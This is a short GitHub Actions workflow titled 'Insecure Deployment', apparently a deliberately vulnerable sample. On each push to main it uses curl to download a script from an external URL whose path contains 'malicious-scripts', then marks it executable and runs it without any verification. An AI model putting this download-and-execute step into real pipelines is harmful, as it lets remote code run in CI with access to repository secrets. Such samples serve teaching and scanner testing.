name: Insecure Deployment

on:  
  push:  
    branches:  
      - main  

jobs:  
  deploy:  
    runs-on: ubuntu-latest  

    steps:  
      - name: Checkout Repository  
        uses: actions/checkout@v3  

      - name: Download and Execute External Script  
        run: |  
          DEPLOY_URL="https://linustimodaniels.github.io/malicious-scripts/deploy.sh"  
          
          # Download script
          curl -o deploy.sh "$DEPLOY_URL"
  
          chmod +x deploy.sh  
          ./deploy.sh  
